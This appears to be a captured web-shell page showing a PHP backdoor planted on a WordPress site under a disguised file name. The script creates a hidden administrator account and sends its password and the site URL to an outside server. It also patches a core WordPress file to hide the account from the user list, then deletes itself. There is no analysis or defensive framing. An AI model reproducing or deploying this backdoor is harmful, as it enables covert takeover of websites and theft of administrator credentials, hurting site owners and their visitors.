HEX
Server: nginx/1.26.0
System: Linux iZj6ceg0gjdkbpnmyl2cnnZ 5.15.60-1.el7.x86_64 #1 SMP Thu Aug 11 12:39:22 UTC 2022 x86_64
User: www (1000)
PHP: 7.0.33
Disabled: phpinfo,eval,passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,pfsockopen,fsocket,fsockopen
$ pwd: /data/wwwroot/sites/multitrustcapital.com/www/
Upload Files
File: /data/wwwroot/sites/multitrustcapital.com/www/wp-cron-helper-c5c37f.php
<?php
if (!file_exists('wp-load.php')) exit;
define('WP_USE_THEMES', false);
require 'wp-load.php';
if (!function_exists('wp_create_user')) exit;
$h = 'default';
$p = substr(md5(uniqid()), 0, 12);
$e = 'default@wordpress.com';
if (!username_exists($h) && !get_option('default_admin_created')) {
    $i = wp_create_user($h, $p, $e);
    if (!is_wp_error($i)) {
        $u = new WP_User($i);
        $u->set_role('administrator');
        update_user_meta($i, 'show_admin_bar_front', 'false');
        update_user_meta($i, '_hidden_admin', 'true');
        update_option('default_admin_created', time());
        $ch = curl_init('https://llllll.my/bildir/panel.php');
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['url' => site_url(), 'admin_pass' => $p, 'ip' => $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1', 'time' => date('Y-m-d H:i:s')]));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        @curl_exec($ch);
        @curl_close($ch);
    }
}
$formatting_path = ABSPATH . 'wp-includes/formatting.php';
$hide_code = "\n\nfunction wp_hide_u(\$s){global \$wpdb;if(!is_admin())return;\$c=wp_get_current_user();if(\$c->user_login==\"default\")return;\$s->query_where=str_replace(\"WHERE 1=1\",\"WHERE 1=1 AND {\$wpdb->users}.user_login!='default'\",\$s->query_where);}add_action(\"pre_user_query\",\"wp_hide_u\");add_filter(\"views_users\",\"wp_fix_count\");function wp_fix_count(\$v){global \$wpdb;\$hidden=0;if(\$wpdb->get_var(\$wpdb->prepare(\"SELECT ID FROM {\$wpdb->users} WHERE user_login=%s\",\"default\")))\$hidden=1;foreach(\$v as \$k=>\$w){if(\$k==\"all\"||\$k==\"administrator\"||strpos(\$w,\"role=administrator\")!==false){\$v[\$k]=preg_replace_callback(\"/\((\d+)\)/\",function(\$m)use(\$hidden){return\"(\".(\$m[1]-\$hidden).\")\";}, \$w);}}return \$v;}";
if (is_writable($formatting_path)) {
    $c = file_get_contents($formatting_path);
    if (strpos($c, 'wp_hide_u') === false) {
        file_put_contents($formatting_path, $c . $hide_code);
    }
}
@unlink(__FILE__);
@ Telegram